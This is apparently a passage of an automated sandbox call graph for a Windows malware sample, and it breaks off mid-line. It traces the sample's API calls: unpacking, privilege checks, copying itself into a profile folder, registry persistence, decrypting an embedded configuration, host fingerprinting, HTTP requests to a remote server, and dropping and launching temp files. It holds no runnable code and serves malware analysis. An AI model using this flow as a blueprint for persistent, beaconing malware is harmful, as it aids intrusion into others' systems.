5803->5805 5804->5805 5805->5802 5806 ec2ed0 GetPEB 5805->5806 5806->5802 4608 e42000 GetPEB 4609 e42059 4608->4609 4610 e421fd VirtualAlloc 4609->4610 4615 e420e0 4609->4615 4618 e42ae1 4610->4618 4612 e42257 VirtualAlloc 4614 e42297 4612->4614 4613 e4234d LoadLibraryA 4613->4614 4614->4613 4616 e423be 4614->4616 4622 ec3b00 4616->4622 4619 e42b0f 4618->4619 4620 e42b0a 4618->4620 4665 e42644 4619->4665 4620->4612 4623 ec3b0d 4622->4623 4676 ec2ed0 4623->4676 4625 ec3b1e GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize 4679 ec4510 4625->4679 4627 ec400a ExitProcess 4628 ec3b54 4628->4627 4697 ec5700 4628->4697 4632 ec3b9f 4731 ec9400 4632->4731 4638 ec3be1 4748 ec5e00 CreateMutexA GetLastError 4638->4748 4640 ec3beb StrStrIA 4749 ec1120 4640->4749 4651 ec3c92 4797 ec5b50 4651->4797 4655 ec3df8 4660 ec3e30 4655->4660 4837 ec78d0 4655->4837 4658 ec3fed Sleep 4658->4627 4658->4660 4659 ec4020 257 API calls 4659->4660 4660->4658 4660->4659 4663 ec3f09 4660->4663 4824 ec7970 4660->4824 4663->4660 4664 ec3f62 VirtualFree 4663->4664 4841 ec42e0 4663->4841 4846 ec4020 4663->4846 4664->4663 4667 e42658 4665->4667 4666 e42670 4666->4620 4667->4666 4669 e42c01 4667->4669 4670 e42c28 4669->4670 4671 e42c42 4670->4671 4673 e42b8a 4670->4673 4671->4666 4674 e42b95 RtlAllocateHeap 4673->4674 4675 e42bad 4674->4675 4675->4671 4869 ec3090 GetPEB 4676->4869 4678 ec2edf 4678->4625 4680 ec47e6 4679->4680 4681 ec4528 4679->4681 4680->4628 4681->4680 4682 ec455b GetModuleFileNameA CreateFileA 4681->4682 4682->4680 4683 ec45a4 GetFileSize 4682->4683 4684 ec45c6 VirtualAlloc 4683->4684 4685 ec47d0 4683->4685 4684->4685 4687 ec45ef ReadFile 4684->4687 4685->4680 4686 ec47d9 CloseHandle 4685->4686 4686->4680 4688 ec466f 4687->4688 4689 ec4625 4687->4689 4688->4685 4691 ec47b2 VirtualFree 4688->4691 4689->4688 4690 ec4637 FindCloseChangeNotification 4689->4690 4870 ec47f0 4690->4870 4691->4685 4694 ec4681 VirtualFree 4696 ec469f 4694->4696 4695 ec47f0 15 API calls 4695->4696 4696->4688 4696->4695 4698 ec3b84 4697->4698 4699 ec5717 4697->4699 4718 ec5a00 4698->4718 4890 ec8f80 4699->4890 4705 ec5773 4959 ec5cd0 4705->4959 4708 ec57d1 4709 ec57f9 GetEnvironmentVariableA 4708->4709 4710 ec57e6 GetAllUsersProfileDirectoryA 4708->4710 4711 ec5810 wnsprintfA CreateFileA 4709->4711 4710->4711 4711->4698 4712 ec5867 GetFileSize 4711->4712 4713 ec5918 CloseHandle 4712->4713 4714 ec5886 VirtualAlloc 4712->4714 4713->4698 4714->4713 4715 ec58ab ReadFile 4714->4715 4716 ec5904 VirtualFree 4715->4716 4717 ec58e4 4715->4717 4716->4713 4717->4713 4719 ec5b44 4718->4719 4720 ec5a18 4718->4720 4719->4632 4720->4719 4721 ec5a3a lstrcpyA 4720->4721 4984 ec5930 4721->4984 4723 ec5a62 4724 ec5a74 lstrlenA 4723->4724 4724->4719 4725 ec5a8c lstrcpyA lstrlenA lstrlenA 4724->4725 4725->4719 4726 ec5abf lstrcatA RegCreateKeyExA 4725->4726 4727 ec5b0a RegCloseKey 4726->4727 4728 ec5b16 4726->4728 4729 ec5b37 lstrlenA 4727->4729 4730 ec5b25 lstrcpyA 4728->4730 4729->4719 4730->4729 4732 ec3bcf 4731->4732 4733 ec941a 4731->4733 4737 ec99f0 GetCurrentProcess OpenProcessToken 4732->4737 4733->4732 4736 ec9502 lstrcpyA CharUpperA 4733->4736 4988 ec8bb0 4733->4988 5004 ec9650 4733->5004 4736->4733 4738 ec9a1f GetTokenInformation 4737->4738 4739 ec3bd7 4737->4739 4740 ec9b76 CloseHandle 4738->4740 4741 ec9a50 GetTokenInformation 4738->4741 4746 ec6060 GetModuleFileNameA 4739->4746 4740->4739 4741->4740 4742 ec9a85 CreateWellKnownSid EqualSid 4741->4742 4742->4739 4743 ec9ad4 CreateWellKnownSid EqualSid 4742->4743 4743->4739 4744 ec9b0a CreateWellKnownSid EqualSid 4743->4744 4744->4739 4745 ec9b40 CreateWellKnownSid EqualSid 4744->4745 4745->4739 4745->4740 4747 ec6091 4746->4747 4747->4638 4748->4640 4750 ec113a 4749->4750 4764 ec1289 4749->4764 4751 ec1144 lstrlenA 4750->4751 4750->4764 4752 ec1156 lstrlenA 4751->4752 4751->4764 4753 ec1168 4752->4753 4752->4764 4754 ec118a GetEnvironmentVariableA 4753->4754 4755 ec1177 GetAllUsersProfileDirectoryA 4753->4755 4756 ec11a1 wnsprintfA lstrcmpiA 4754->4756 4755->4756 4757 ec11db 4756->4757 4758 ec1216 4756->4758 4757->4758 4759 ec11e3 CopyFileA SetFileAttributesA lstrcpyA 4757->4759 5013 ec97a0 GetProcessHeap RtlAllocateHeap 4758->5013 4759->4758 4761 ec1220 lstrcpyA lstrcpyA CreateThread 4762 ec12a3 4761->4762 4761->4764 5014 ec12d0 4761->5014 4763 ec97c0 2 API calls 4762->4763 4763->4764 4765 ec5e30 4764->4765 4766 ec5e5d 4765->4766 4767 ec5e64 RegOpenKeyExA 4765->4767 4766->4767 4768 ec5e8c RegQueryValueExA 4767->4768 4769 ec3c39 4767->4769 4770 ec5ebc 4768->4770 4771 ec5edc 4768->4771 4776 ec6cf0 4769->4776 4770->4771 4773 ec5ece RegDeleteValueA 4770->4773 4772 ec5f15 RegCloseKey 4771->4772 5020 ec9bd0 4771->5020 4772->4769 4773->4771 4777 ec6d0c 4776->4777 4778 ec6d13 RegOpenKeyExA 4776->4778 4777->4778 4779 ec3c4d 4778->4779 4780 ec6d3a RegQueryValueExA 4778->4780 4783 ec5f30 4779->4783 4781 ec6d84 RegCloseKey 4780->4781 4782 ec6d70 RegDeleteValueA 4780->4782 4781->4779 4782->4781 5024 ec7d20 4783->5024 4786 ec5f99 RegOpenKeyExA 4788 ec3c58 4786->4788 4789 ec5fc1 RegQueryValueExA 4786->4789 4787 ec5f92 4787->4786 4794 ec9b90 4788->4794 4790 ec5ffc 4789->4790 4791 ec6041 RegCloseKey 4790->4791 4792 ec9bd0 QueryPerformanceCounter 4790->4792 4791->4788 4793 ec6020 RegSetValueExA 4792->4793 4793->4791 4795 ec9ba0 QueryPerformanceCounter 4794->4795 4796 ec3c71 WSAStartup 4794->4796 4795->4796 4796->4627 4796->4651 4798 ec3dac 4797->4798 4799 ec5b67 4797->4799 4811 ec8a70 4798->4811 4799->4798 4800 ec5b7b lstrlenA lstrlenA 4799->4800 4801 ec5ba3 4800->4801 4802 ec5bab StrStrIA 4801->4802 4803 ec5be0 VirtualAlloc 4801->4803 4802->4801 4804 ec5bdc 4802->4804 4803->4798 4805 ec5c09 4803->4805 4804->4803 4806 ec5c1f StrStrIA 4805->4806 4807 ec5c7f 4805->4807 4806->4807 4808 ec5c39 lstrcpynA 4806->4808 4807->4798 4809 ec5c91 VirtualAlloc 4807->4809 4808->4805 4809->4798 4810 ec5cad 4809->4810 4810->4798 4812 ec8a87 4811->4812 4813 ec8ba3 4811->4813 4812->4813 4814 ec8ab9 CryptAcquireContextA 4812->4814 4813->4655 4815 ec8add GetLastError 4814->4815 4816 ec8b12 4814->4816 4817 ec8aef 4815->4817 4818 ec8af8 CryptAcquireContextA 4815->4818 4816->4813 4819 ec8b1c CryptImportKey 4816->4819 4817->4816 4817->4818 4818->4816 4820 ec8b97 CryptReleaseContext 4819->4820 4821 ec8b41 CryptImportKey 4819->4821 4820->4813 4822 ec8b8d CryptDestroyKey 4821->4822 4823 ec8b68 CryptDecrypt CryptDestroyKey 4821->4823 4822->4820 4823->4822 4825 ec7ae9 4824->4825 4826 ec7987 VirtualAlloc 4824->4826 4825->4660 4826->4825 4827 ec79b6 4826->4827 5026 eca400 4827->5026 4830 ec7ad8 VirtualFree 4830->4825 4831 ec8a70 9 API calls 4832 ec7a15 4831->4832 4832->4830 4833 ec7a20 VirtualAlloc 4832->4833 4833->4830 4835 ec7a5a 4833->4835 4834 ec7ad0 4834->4830 4835->4834 4836 ec7a89 inet_ntoa wnsprintfA 4835->4836 4836->4835 4838 ec7965 4837->4838 4839 ec78e4 4837->4839 4838->4660 4839->4838 4840 ec7927 inet_ntoa wnsprintfA 4839->4840 4840->4839 4842 ec42fa VirtualAlloc 4841->4842 4844 ec44fd 4841->4844 4843 ec44a3 4842->4843 4842->4844 4843->4844 5033 ec92e0 4843->5033 4844->4663 4847 ec42d7 4846->4847 4848 ec4034 4846->4848 4847->4663 4848->4847 4849 ec405f InitializeCriticalSection CreateEventA 4848->4849 4850 ec409f 4849->4850 4851 ec42cd DeleteCriticalSection 4850->4851 4852 ec40ab EnterCriticalSection 4850->4852 4851->4847 4853 ec40da 4852->4853 4854 ec40bb VirtualFree 4852->4854 4855 ec40e0 TerminateThread 4853->4855 4856 ec40f3 ResetEvent LeaveCriticalSection CreateThread 4853->4856 4854->4853 4855->4856 5041 ec97a0 GetProcessHeap RtlAllocateHeap 4856->5041 5095 ec4ac0 4856->5095 4858 ec413a 4859 ec4221 WaitForMultipleObjects WaitForSingleObject 4858->4859 4866 ec41d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 4858->4866 4860 ec424f WaitForSingleObject 4859->4860 4861 ec424b 4859->4861 4862 ec4267 TerminateThread 4860->4862 4863 ec4273 EnterCriticalSection 4860->4863 4861->4860 4862->4863 4864 ec42a2 LeaveCriticalSection 4863->4864 4865 ec4283 VirtualFree 4863->4865 4867 ec97c0 2 API calls 4864->4867 4865->4864 4866->4858 5042 ec4ba0 CoInitialize 4866->5042 4868 ec42bb 4867->4868 4868->4851 4869->4678 4871 ec4665 4870->4871 4872 ec4807 4870->4872 4871->4688 4871->4694 4871->4696 4872->4871 4873 ec4814 CryptAcquireContextA 4872->4873 4874 ec4834 GetLastError 4873->4874 4877 ec4856 4873->4877 4875 ec4841 CryptAcquireContextA 4874->4875 4874->4877 4875->4877 4876 ec4a9f CryptReleaseContext 4876->4871 4877->4871 4877->4876 4878 ec48be CryptCreateHash 4877->4878 4879 ec48f9 CryptHashData 4878->4879 4880 ec4a90 4878->4880 4881 ec4919 CryptDeriveKey 4879->4881 4882 ec4a83 CryptDestroyHash 4879->4882 4880->4876 4881->4882 4883 ec494a CryptDecrypt CryptDestroyKey 4881->4883 4882->4880 4883->4882 4884 ec4995 CryptCreateHash 4883->4884 4884->4882 4885 ec49b7 CryptHashData 4884->4885 4886 ec49da CryptGetHashParam 4885->4886 4887 ec4a76 CryptDestroyHash 4885->4887 4886->4887 4888 ec4a11 CryptGetHashParam 4886->4888 4887->4882 4888->4887 4889 ec4a3e 4888->4889 4889->4887 4891 ec572e GetModuleFileNameA 4890->4891 4892 ec8f9a 4890->4892 4930 ec1ca0 CreateToolhelp32Snapshot 4891->4930 4892->4891 4893 ec8fed GetVersionExA 4892->4893 4894 ec9005 GetSystemInfo 4893->4894 4895 ec9266 4893->4895 4897 ec901c 4894->4897 4898 ec9115 4894->4898 4895->4891 4896 ec926c lstrcatA 4895->4896 4896->4891 4900 ec9025 lstrcatA 4897->4900 4901 ec9042 4897->4901 4899 ec9110 4898->4899 4904 ec912b 4898->4904 4905 ec9174 4898->4905 4969 ec9290 GetModuleHandleA GetProcAddress 4899->4969 4900->4899 4902 ec9068 4901->4902 4903 ec904b lstrcatA 4901->4903 4902->4899 4915 ec90a1 GetSystemMetrics 4902->4915 4920 ec9087 lstrcatA 4902->4920 4903->4899 4910 ec914e 4904->4910 4911 ec9134 lstrcatA 4904->4911 4908 ec917d 4905->4908 4909 ec91c3 4905->4909 4916 ec9186 lstrcatA 4908->4916 4917 ec91a0 4908->4917 4909->4899 4924 ec91ef 4909->4924 4925 ec91d5 lstrcatA 4909->4925 4910->4899 4914 ec9157 lstrcatA 4910->4914 4911->4899 4912 ec9228 lstrlenA 4918 ec9259 lstrlenA 4912->4918 4919 ec9239 lstrcatA lstrcatA 4912->4919 4913 ec9219 lstrcatA 4913->4912 4914->4899 4921 ec90ad lstrcatA 4915->4921 4922 ec90c7 GetSystemMetrics 4915->4922 4916->4899 4917->4899 4923 ec91a9 lstrcatA 4917->4923 4918->4895 4919->4918 4920->4899 4921->4899 4926 ec90ed 4922->4926 4927 ec90d3 lstrcatA 4922->4927 4923->4899 4924->4899 4928 ec91f8 lstrcatA 4924->4928 4925->4899 4926->4899 4929 ec90f8 lstrcatA 4926->4929 4927->4899 4928->4899 4929->4899 4931 ec1cc9 Process32First 4930->4931 4932 ec1e51 4930->4932 4933 ec1cee GetCurrentProcessId 4931->4933 4934 ec1e44 CloseHandle 4931->4934 4948 ec9d20 4932->4948 4935 ec1d04 4933->4935 4934->4932 4936 ec1d20 Process32Next 4935->4936 4937 ec1d12 4935->4937 4936->4935 4936->4937 4937->4934 4938 ec1d44 Process32First 4937->4938 4938->4934 4939 ec1d5f 4938->4939 4940 ec1e29 Process32Next 4939->4940 4941 ec1d71 lstrlenA 4939->4941 4940->4934 4940->4939 4942 ec1e27 4941->4942 4943 ec1d87 lstrcpyA OpenProcess 4941->4943 4942->4934 4943->4942 4944 ec1dbb EnumProcessModules 4943->4944 4945 ec1de5 GetModuleFileNameExA 4944->4945 4946 ec1e02 GetProcessImageFileNameA 4944->4946 4947 ec1e16 FindCloseChangeNotification 4945->4947 4946->4947 4947->4942 4949 ec9f5d 4948->4949 4950 ec9d37 4948->4950 4949->4705 4950->4949 4951 ec9d4b GetSystemDirectoryA 4950->4951 4951->4949 4952 ec9da8 GetVolumeInformationA 4951->4952 4952->4949 4953 ec9deb 4952->4953 4972 ec9f70 4953->4972 4957 ec9f0c WideCharToMultiByte lstrcpynA 4958 ec9f50 CoTaskMemFree 4957->4958 4958->4949 4960 ec579d lstrcpyA 4959->4960 4961 ec5ce7 lstrlenA 4959->4961 4960->4708 4961->4960 4962 ec5cfa CreateFileA 4961->4962 4962->4960 4963 ec5d23 GetFileSize 4962->4963 4964 ec5d9f FindCloseChangeNotification 4963->4964 4965 ec5d38 VirtualAlloc 4963->4965 4964->4960 4965->4964 4966 ec5d54 ReadFile 4965->4966 4967 ec5d8e VirtualFree 4966->4967 4968 ec5d7b 4966->4968 4967->4964 4968->4967 4970 ec92bd GetCurrentProcess 4969->4970 4971 ec9215 4969->4971 4970->4971 4971->4912 4971->4913 4973 ec9f87 4972->4973 4978 ec9e2d StringFromCLSID 4972->4978 4973->4978 4980 ec97a0 GetProcessHeap RtlAllocateHeap 4973->4980 4975 ec9fb2 4976 ec9fc8 GetAdaptersInfo 4975->4976 4975->4978 4979 ec9ff4 4976->4979 4978->4957 4978->4958 4981 ec97c0 4979->4981 4980->4975 4982 ec97dc 4981->4982 4983 ec97c9 GetProcessHeap HeapFree 4981->4983 4982->4978 4983->4982 4985 ec59f3 4984->4985 4987 ec5949 4984->4987 4985->4723 4986 ec59de CharUpperA 4986->4987 4987->4985 4987->4986 4989 ec8ce7 4988->4989 4990 ec8bc7 4988->4990 4989->4733 4990->4989 4991 ec8be5 CryptAcquireContextA 4990->4991 4992 ec8c3e 4991->4992 4993 ec8c09 GetLastError 4991->4993 4992->4989 4996 ec8c48 CryptCreateHash 4992->4996 4994 ec8c1b 4993->4994 4995 ec8c24 CryptAcquireContextA 4993->4995 4994->4992 4994->4995 4995->4992 4997 ec8cdb CryptReleaseContext 4996->4997 4998 ec8c63 CryptHashData 4996->4998 4997->4989 4999 ec8c7b CryptGetHashParam 4998->4999 5000 ec8cd1 CryptDestroyHash 4998->5000 4999->5000 5001 ec8ca3 4999->5001 5000->4997 5001->5000 5002 ec8cab CryptGetHashParam 5001->5002 5002->5000 5003 ec8ccb 5002->5003 5003->5000 5005 ec9667 5004->5005 5006 ec9722 5004->5006 5005->5006 5007 ec9685 lstrlenA 5005->5007 5006->4733 5008 ec9699 5007->5008 5009 ec96fd lstrlenA 5008->5009 5012 ec96d4 lstrcatA lstrlenA 5008->5012 5010 ec970c 5009->5010 5011 ec9715 lstrlenA 5009->5011 5010->5011 5011->5006 5012->5008 5013->4761 5015 ec12fc 5014->5015 5017 ec12e6 5014->5017 5016 ec131d RegOpenKeyExA 5018 ec1378 Sleep 5016->5018 5019 ec1341 lstrlenA RegSetValueExA RegCloseKey 5016->5019 5017->5015 5017->5016 5018->5017 5019->5018 5021 ec5ef6 RegSetValueExA 5020->5021 5022 ec9bda 5020->5022 5021->4772 5022->5021 5023 ec9b90 QueryPerformanceCounter 5022->5023 5023->5022 5025 ec5f58 lstrcpyA lstrcatA 5024->5025 5025->4786 5025->4787 5027 ec79d2 5026->5027 5028 eca417 5026->5028 5027->4830 5027->4831 5028->5027 5029 eca442 RegOpenKeyExA 5028->5029 5029->5027 5030 eca466 RegQueryValueExA 5029->5030 5031 eca48a 5030->5031 5032 eca490 RegCloseKey 5030->5032 5031->5032 5032->5027 5034 ec93f8 5033->5034 5035 ec92fa 5033->5035 5034->4843 5035->5034 5036 ec9304 GetLocalTime 5035->5036 5038 ec9322 5036->5038 5037 ec8bb0 9 API calls 5037->5038 5038->5034 5038->5037 5039 ec9650 5 API calls 5038->5039 5040 ec93c9 lstrcatA 5039->5040 5040->5038 5041->4858 5043 ec56f0 CoUninitialize 5042->5043 5044 ec4bc2 5042->5044 5045 ec4bd1 SetEvent 5044->5045 5046 ec4bf9 5045->5046 5046->5043 5047 ec4c28 VirtualAlloc VirtualAlloc VirtualAlloc 5046->5047 5048 ec4c10 WaitForSingleObject 5046->5048 5049 ec4c23 5047->5049 5050 ec4c8a 5047->5050 5048->5047 5048->5049 5049->5043 5050->5049 5052 ec4cc3 5050->5052 5054 ec52a2 5050->5054 5057 ec4e2c 5052->5057 5058 ec4db7 GetCurrentThreadId 5052->5058 5067 ec4ce5 5052->5067 5108 ec8370 5054->5108 5055 ec56b8 VirtualFree VirtualFree VirtualFree 5055->5049 5056 ec5354 lstrlenA lstrlenA 5056->5055 5059 ec5385 wsprintfA CryptBinaryToStringA 5056->5059 5061 ec4ee1 5057->5061 5062 ec4e81 GetSystemMetrics GetSystemMetrics 5057->5062 5057->5067 5058->5067 5059->5055 5060 ec53d0 MultiByteToWideChar 5059->5060 5127 ec17d0 5060->5127 5065 ec4f40 5061->5065 5066 ec4ef0 GlobalMemoryStatus 5061->5066 5062->5067 5065->5067 5071 ec4fdf lstrlenA 5065->5071 5072 ec5032 5065->5072 5066->5067 5068 ec569b 5068->5055 5069 ec56a4 VirtualFree 5068->5069 5069->5055 5070 ec547d VirtualFree 5092 ec54b1 5070->5092 5071->5067 5073 ec5096 5072->5073 5074 ec5041 lstrlenA 5072->5074 5076 ec5104 5073->5076 5077 ec50a5 lstrlenA 5073->5077 5074->5067 5075 ec552c EnterCriticalSection 5078 ec558c VirtualAlloc 5075->5078 5079 ec5542 VirtualAlloc 5075->5079 5081 ec5172 5076->5081 5082 ec5113 lstrlenA 5076->5082 5077->5067 5083 ec568e LeaveCriticalSection 5078->5083 5084 ec55c7 GetTickCount 5078->5084 5080 ec5578 5079->5080 5080->5083 5086 ec51e0 5081->5086 5087 ec5181 lstrlenA 5081->5087 5082->5067 5083->5068 5093 ec55da 5084->5093 5085 ec17d0 16 API calls 5085->5092 5088 ec523f 5086->5088 5089 ec51ef lstrlenA 5086->5089 5087->5067 5088->5067 5091 ec9b90 QueryPerformanceCounter 5088->5091 5089->5067 5090 ec551b 5090->5068 5090->5075 5091->5067 5092->5085 5092->5090 5094 ec565c VirtualFree 5093->5094 5094->5083 5096 ec4b96 5095->5096 5097 ec4ad6 CoInitialize 5095->5097 5098 ec4ade 5097->5098 5099 ec4aeb WaitForSingleObject 5098->5099 5100 ec4b80 Sleep 5098->5100 5099->5100 5101 ec4b01 EnterCriticalSection 5099->5101 5100->5098 5185 ec8250 5101->5185 5104 ec4b50 5190 ec62b0 5104->5190 5107 ec4b90 CoUninitialize 5107->5096 5109 ec8387 5108->5109 5110 ec5344 5108->5110 5109->5110 5111 ec83b1 VirtualAlloc VirtualAlloc 5109->5111 5110->5055 5110->5056 5112 ec83e9 5111->5112 5113 ec8592 5111->5113 5112->5113 5131 ec8800 5112->5131 5114 ec8598 VirtualFree 5113->5114 5115 ec85a9 5113->5115 5114->5115 5115->5110 5117 ec85af VirtualFree 5115->5117 5117->5110 5123 ec847e 5153 ec8970 5123->5153 5125 ec8581 VirtualFree 5125->5113 5126 ec84ad 5126->5125 5128 ec181e 5127->5128 5129 ec17e1 5127->5129 5128->5068 5128->5070 5128->5090 5129->5128 5164 ec1840 5129->5164 5132 ec8420 5131->5132 5133 ec8817 5131->5133 5132->5113 5147 ec8770 5132->5147 5133->5132 5134 ec8821 CryptAcquireContextA 5133->5134 5135 ec887a 5134->5135 5136 ec8845 GetLastError 5134->5136 5135->5132 5139 ec8884 CryptGenKey 5135->5139 5137 ec8857 5136->5137 5138 ec8860 CryptAcquireContextA 5136->5138 5137->5135 5137->5138 5138->5135 5140 ec88bd CryptExportKey 5139->5140 5141 ec8950 CryptReleaseContext 5139->5141 5142 ec8946 CryptDestroyKey 5140->5142 5144 ec88d9 5140->5144 5141->5132 5142->5141 5143 ec893d 5143->5142 5144->5143 5145 ec88f1 CryptImportKey 5144->5145 5145->5143 5146 ec8916 CryptExportKey CryptDestroyKey 5145->5146 5146->5143 5148 ec87d0 QueryPerformanceCounter 5147->5148 5149 ec844b 5148->5149 5150 ec87d0 5149->5150 5151 ec8458 VirtualAlloc 5150->5151 5152 ec87e3 QueryPerformanceCounter 5150->5152 5151->5113 5151->5123 5152->5151 5154 ec8987 5153->5154 5155 ec8a60 5153->5155 5154->5155 5156 ec89a5 CryptAcquireContextA 5154->5156 5155->5126 5157 ec89fe 5156->5157 5158 ec89c9 GetLastError 5156->5158 5157->5155 5161 ec8a04 CryptImportKey 5157->5161 5159 ec89db 5158->5159 5160 ec89e4 CryptAcquireContextA 5158->5160 5159->5157 5159->5160 5160->5157 5162 ec8a29 CryptEncrypt CryptDestroyKey 5161->5162 5163 ec8a54 CryptReleaseContext 5161->5163 5162->5163 5163->5155 5165 ec1c95 5164->5165 5166 ec185a 5164->5166 5165->5128 5166->5165 5167 ec18ba InternetCrackUrlA 5166->5167 5167->5165 5168 ec1910 InternetOpenA 5167->5168 5168->5165 5169 ec1936 InternetConnectA 5168->5169 5170 ec196f HttpOpenRequestA 5169->5170 5171 ec1c88 InternetCloseHandle 5169->5171 5172 ec19ad wnsprintfA HttpAddRequestHeadersA 5170->5172 5173 ec1c7b InternetCloseHandle 5170->5173 5171->5165 5174 ec1c6e InternetCloseHandle 5172->5174 5175 ec19eb InternetSetOptionA 5172->5175 5173->5171 5174->5173 5184 ec1a30 5175->5184 5177 ec1a4d HttpSendRequestA 5178 ec1a7b HttpQueryInfoA 5177->5178 5177->5184 5178->5184 5179 ec1adc HttpQueryInfoA 5180 ec1b47 VirtualAlloc 5179->5180 5179->5184 5181 ec1c19 5180->5181 5180->5184 5183 ec1c23 InternetReadFile 5181->5183 5182 ec1b99 InternetReadFile 5182->5184 5183->5183 5183->5184 5184->5174 5184->5177 5184->5179 5184->5180 5184->5182 5186 ec4b37 LeaveCriticalSection 5185->5186 5189 ec8267 5185->5189 5186->5100 5186->5104 5187 ec82e7 StrStrA 5187->5186 5187->5189 5189->5186 5189->5187 5273 ec8090 5189->5273 5191 ec62ca 5190->5191 5203 ec4b5d VirtualFree SetEvent 5190->5203 5192 ec6427 5191->5192 5193 ec6399 5191->5193 5191->5203 5194 ec64ba GetEnvironmentVariableA 5192->5194 5200 ec65f3 5192->5200 5192->5203 5197 ec63a4 VirtualAlloc 5193->5197 5198 ec6410 5193->5198 5195 ec64e1 5194->5195 5295 ec9730 5195->5295 5196 ec6bdd 5196->5203 5369 eca360 5196->5369 5201 ec63cc 5197->5201 5202 ec640e 5197->5202 5199 ec1ee0 2 API calls 5198->5199 5199->5202 5200->5196 5334 ec7250 5200->5334 5210 ec63fd VirtualFree 5201->5210 5292 ec1ee0 CreateThread 5201->5292 5202->5192 5203->5107 5209 ec6552 WriteFile 5211 ec65dd 5209->5211 5212 ec6588 5209->5212 5210->5202 5211->5200 5216 ec65e6 CloseHandle 5211->5216 5212->5211 5218 ec6593 CloseHandle 5212->5218 5213 ec6654 VirtualAlloc 5214 ec6752 5213->5214 5219 ec667a 5213->5219 5217 ec69ba GetEnvironmentVariableA 5214->5217 5221 ec678e VirtualAlloc 5214->5221 5222 ec6858 5214->5222 5216->5200 5224 ec69e1 5217->5224 5299 ec6c60 5218->5299 5346 ec97a0 GetProcessHeap RtlAllocateHeap 5219->5346 5226 ec6856 5221->5226 5238 ec67c6 5221->5238 5225 ec2070 32 API calls 5222->5225 5230 ec9730 QueryPerformanceCounter 5224->5230 5225->5226 5233 ec69a6 5226->5233 5236 ec6894 5226->5236 5237 ec6880 5226->5237 5231 ec69f2 GetTickCount GetTempFileNameA CreateFileA 5230->5231 5235 ec6a4f 5231->5235 5272 ec6bbd 5231->5272 5232 ec6698 CreateThread CloseHandle 5232->5214 5233->5217 5242 ec6b1e WriteFile 5235->5242 5243 ec6a7b VirtualAlloc 5235->5243 5245 ec698a 5236->5245 5357 ec97a0 GetProcessHeap RtlAllocateHeap 5236->5357 5350 ec73c0 5237->5350 5239 ec6842 VirtualFree 5238->5239 5347 ec2070 5238->5347 5239->5226 5240 ec65d8 5248 ec6cf0 4 API calls 5240->5248 5241 ec65c9 5311 ec74a0 5241->5311 5249 ec6b1c 5242->5249 5243->5249 5250 ec6aaf 5243->5250 5245->5233 5358 ec2510 5245->5358 5248->5211 5256 ec6bc9 CloseHandle 5249->5256 5259 ec6b59 CloseHandle 5249->5259 5264 ec6b08 VirtualFree 5250->5264 5265 ec6ad2 WriteFile 5250->5265 5256->5272 5257 ec68aa 5260 ec68e9 VirtualAlloc 5257->5260 5261 ec68ca 5257->5261 5258 ec6809 VirtualAlloc 5262 ec683f 5258->5262 5266 ec1e60 2 API calls 5259->5266 5260->5261 5263 ec690f 5260->5263 5261->5245 5267 ec693f CreateThread CloseHandle 5261->5267 5262->5239 5263->5261 5264->5249 5265->5264 5268 ec6b72 5266->5268 5267->5245 5397 ec77b0 5267->5397 5269 ec6b9e 5268->5269 5270 ec73c0 5 API calls 5268->5270 5268->5272 5271 ec2510 8 API calls 5269->5271 5269->5272 5270->5269 5271->5272 5272->5196 5274 ec8246 5273->5274 5275 ec80a7 5273->5275 5274->5189 5275->5274 5276 ec80c5 VirtualAlloc 5275->5276 5276->5274 5277 ec80eb 5276->5277 5285 ec1390 5277->5285 5279 ec8204 5279->5274 5280 ec8235 VirtualFree 5279->5280 5280->5274 5281 ec8100 5281->5279 5282 ec8a70 9 API calls 5281->5282 5283 ec81dd 5282->5283 5283->5279 5284 ec81e4 VirtualAlloc 5283->5284 5284->5279 5286 ec139c 5285->5286 5287 ec13ae 5285->5287 5286->5287 5288 ec13b6 GetProcessHeap RtlAllocateHeap 5286->5288 5287->5281 5288->5287 5290 ec13e4 5288->5290 5289 ec14e4 GetProcessHeap RtlFreeHeap 5289->5287 5290->5289 5291 ec1498 GetProcessHeap HeapFree 5290->5291 5291->5287 5293 ec1f0a WaitForSingleObject 5292->5293 5294 ec1f21 5292->5294 5293->5294 5294->5210 5296 ec64f2 GetTickCount GetTempFileNameA CreateFileA 5295->5296 5298 ec9743 5295->5298 5296->5200 5296->5209 5297 ec9763 QueryPerformanceCounter 5297->5298 5298->5296 5298->5297 5300 ec6c7c 5299->5300 5301 ec6c83 RegOpenKeyExA 5299->5301 5300->5301 5302 ec6ca7 5301->5302 5303 ec65ab 5301->5303 5304 ec9b90 QueryPerformanceCounter 5302->5304 5306 ec1e60 5303->5306 5305 ec6cae RegSetValueExA RegCloseKey 5304->5305 5305->5303 5307 ec1ece 5306->5307 5308 ec1e73 5306->5308 5307->5240 5307->5241 5309 ec1e90 CreateProcessA 5308->5309 5309->5307 5310 ec1ebe CloseHandle 5309->5310 5310->5307 5312 ec74bc 5311->5312 5313 ec74d2 Sleep 5312->5313 5314 ec750b 5313->5314 5315 ec74f5 GetModuleFileNameA 5313->5315 5317 ec7536 GetEnvironmentVariableA 5314->5317 5318 ec7520 GetAllUsersProfileDirectoryA 5314->5318 5316 ec7583 SetFileAttributesA wnsprintfA 5315->5316 5320 ec75c6 TerminateThread 5316->5320 5322 ec75d4 RegOpenKeyExA 5316->5322 5319 ec754d lstrcatA lstrcatA lstrcatA 5317->5319 5318->5319 5319->5316 5320->5322 5323 ec7649 5322->5323 5324 ec762a RegDeleteValueA RegCloseKey 5322->5324 5325 ec765e GetEnvironmentVariableA GetTickCount GetTempFileNameA lstrcatA CreateFileA 5323->5325 5326 ec5e30 6 API calls 5323->5326 5324->5323 5327 ec76df lstrlenA WriteFile CloseHandle 5325->5327 5328 ec65ce ExitProcess 5325->5328 5330 ec765b 5326->5330 5329 ec7731 5327->5329 5331 ec7744 CreateProcessA 5329->5331 5330->5325 5332 ec7796 CloseHandle 5331->5332 5333 ec77a3 ExitProcess 5331->5333 5332->5333 5335 ec6638 5334->5335 5336 ec7264 5334->5336 5335->5213 5335->5214 5336->5335 5337 ec72ad wsprintfA 5336->5337 5338 ec72df RegOpenKeyExA 5337->5338 5339 ec72d8 5337->5339 5338->5335 5340 ec7307 RegQueryValueExA 5338->5340 5339->5338 5341 ec73a5 RegCloseKey 5340->5341 5342 ec7333 5340->5342 5341->5335 5342->5341 5343 ec7339 GetLocalTime 5342->5343 5374 ec9910 SystemTimeToFileTime SystemTimeToFileTime 5343->5374 5345 ec7388 5345->5341 5346->5232 5376 